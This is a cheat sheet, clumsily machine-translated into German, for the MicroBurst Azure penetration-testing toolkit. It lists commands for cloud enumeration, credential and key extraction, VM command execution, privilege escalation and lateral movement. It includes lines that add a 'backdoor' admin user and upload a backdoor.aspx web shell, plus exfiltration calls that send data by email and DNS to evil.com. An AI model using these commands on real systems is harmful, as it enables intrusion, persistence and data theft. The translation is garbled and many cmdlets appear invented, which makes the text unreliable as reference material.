MicroBurst Azure Security Testing Toolkit Cheat Sheet
Überblick
MicroBurst ist eine Sammlung von PowerShell-Skripten, die von NetSPI für die Bewertung von Microsoft Azure-Sicherheit entwickelt wurden. Es umfasst Werkzeuge für Azure Service Entdeckung, Privileg Eskalation, laterale Bewegung und Daten Exfiltration, so dass es ein umfassendes Toolkit für Azure Penetration Test.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation
Installation von PowerShell
```powershell
Install from PowerShell Gallery
Install-Module -Name MicroBurst
Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
Update existing installation
Update-Module -Name MicroBurst
Import module
Import-Module MicroBurst ```_
Manuelle Installation
```powershell
Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip" Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
Install dependencies
Install-Module -Name Az Install-Module -Name AzureAD ```_
Gierinstallation
```bash
Clone repository
git clone https://github.com/NetSPI/MicroBurst.git cd MicroBurst
Import in PowerShell
Import-Module .\MicroBurst.psd1 ```_
Basisnutzung
Modulaufbau
```powershell
Import MicroBurst
Import-Module MicroBurst
Get available commands
Get-Command -Module MicroBurst
Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
Check module version
Get-Module MicroBurst ```_
Authentication
```powershell
Interactive authentication
Connect-AzAccount
Service principal authentication
$credential = Get-Credential Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id" ```_
Befehlsnummer
Reconnaissance Funktionen
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs | |
| | Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains | |
| | Get-AzurePasswords | Extract passwords from Azure resources | |
| | Get-AzureDomainInfo | Get domain information | |
| | Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs | |
Funktionen des Speicherkontos
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs | Find accessible storage blobs | |
| | Get-AzureBlobFiles | Download files from storage | |
| | Invoke-AzureStorageAccountEnum | Enumerate storage accounts | |
| | Get-AzureStorageAccountKeys | Extract storage account keys | |
Virtuelle Maschinenfunktionen
| | Function | Description | |
| --- | --- |
| | Invoke-AzureRmVmBulkCMD | Bulk command execution | |
| | Get-AzureVMDisk | Access VM disk information | |
| | Invoke-AzureVMUserDataEnum | Enumerate VM user data | |
| | Get-AzureVMExtensionSettings | Get VM extension settings | |
Azure Storage Enumeration
Blob Storage Discovery
```powershell
Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10 ```_
Speicherkonto Aufzählung
```powershell
Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\" ```_
Datei teilen Enumeration
```powershell
Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\" ```_
Subdomain und Service Discovery
Azure Subdomain Enumeration
```powershell
Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt" ```_
Service Discovery
```powershell
Discover Azure services
Get-AzureServices -Domain "company.com"
Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id" ```_
DNS Aufzählung
```powershell
Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt" ```_
Virtual Machine Exploitation
VM Befehlsausübung
```powershell
Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3") Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1" ```_
Zugriff auf die Festplatte
```powershell
Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\" ```_
VM Erweiterung Exploitation
```powershell
Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add" ```_
Credential and Secret Extraction
Passwort-Extraktion
```powershell
Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id" ```_
Zertifikatsextraktion
```powershell
Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\" ```_
Konfiguration Datenextraktion
```powershell
Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name" ```_
Datenbankauswertung
SQL Datenbank Enumeration
```powershell
Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name" ```_
Zugriff auf die Datenbank
```powershell
Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\" ```_
CosmosDB Exploitation
```powershell
Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container" ```_
Web Application Exploitation
Web App Aufzählung
```powershell
Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name" ```_
Web App Exploitation
```powershell
Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name" ```_
Funktion App Exploitation
```powershell
Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name" ```_
Vorrechte Eskalation
Rollenzuweisung Aufzählung
```powershell
Get current user roles
Get-AzureCurrentUserRoles
Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id" ```_
Service Principal Missbrauch
```powershell
Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser" ```_
Managed Identity Exploitation
```powershell
Check for managed identity
Test-AzureManagedIdentity
Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription" ```_
Spätere Bewegung
Überschrift Zugang
```powershell
Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id" ```_
Cross-Tenant Zugang
```powershell
Enumerate accessible tenants
Get-AzureAccessibleTenants
Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id" ```_
Resource Group Pivoting
```powershell
Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```_
Daten Exfiltration
Massendatenextraktion
```powershell
Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```_
Stealth Exfiltration
```powershell
Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```_
Automatisierung und Schrift
Automatisierte Beurteilung Script
```powershell
Comprehensive Azure assessment
param( [string]$SubscriptionId, [string]$OutputPath = "C:\AzureAssessment" )
Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
Authenticate
Connect-AzAccount
Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
Enumerate subdomains
Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name $subdomains|Out-File "$OutputPath\subdomains.txt"
Enumerate storage blobs
Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name $blobs|Out-File "$OutputPath\blobs.txt"
Extract passwords
Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId $passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
Get VM information
Write-Host "Gathering VM information..." $vms = Get-AzVM $vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
Generate summary report
$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}
| $summary | ConvertTo-Json | Out-File "$OutputPath\summary.json" |
Write-Host "Assessment completed. Results saved to $OutputPath" ```_
Kontinuierliche Überwachung
```powershell
Continuous Azure monitoring
param( [int]$IntervalMinutes = 60, [string]$LogPath = "C:\AzureMonitoring\monitor.log" )
while ($true) \\{ $timestamp = Get-Date Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\} ```_
Fehlerbehebung
Authentifizierungsfragen
```powershell
Clear cached credentials
Clear-AzContext -Force
Test authentication
$context = Get-AzContext if (-not $context) \\{ Write-Error "Not authenticated to Azure" Connect-AzAccount \\}
Verify subscription access
Get-AzSubscription ```_
Modulfragen
```powershell
Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
Update MicroBurst
Update-Module MicroBurst -Force
Check dependencies
Get-Module Az -ListAvailable ```_
Genehmigungsfragen
```powershell
Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id $roleAssignments|Select-Object RoleDefinitionName, Scope
Test specific permissions
try \\{ Get-AzStorageAccount -ErrorAction Stop Write-Output "Storage account read permission: OK" \\} catch \\{ Write-Output "Storage account read permission: DENIED" \\} ```_
Integration mit anderen Tools
BlutHound Integration
```powershell
Export data for BloodHound
$azureData = @\\{ users = Get-AzADUser groups = Get-AzADGroup servicePrincipals = Get-AzADServicePrincipal roleAssignments = Get-AzRoleAssignment \\}
Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData | $bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json" | ```_
Metasploit Integration
```ruby
Metasploit module for MicroBurst
require 'msf/core'
class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Azure MicroBurst Integration', 'Description' => 'Execute MicroBurst functions via Metasploit', 'Author' => ['NetSPI'], 'License' => MSF_LICENSE ))
register_options([
OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])
end
def run subscription_id = datastore['SUBSCRIPTION_ID'] function = datastore['FUNCTION']
# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"
print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command
end end ```_
Ressourcen
- MicroBurst GitHub Repository
- [NetSPI Blog](LINK_5 -%20(_LINK_5)
- (__LINK_5___)
- (__LINK_5___)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von MicroBurst. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie Azure Sicherheitsbewertungen durchführen. *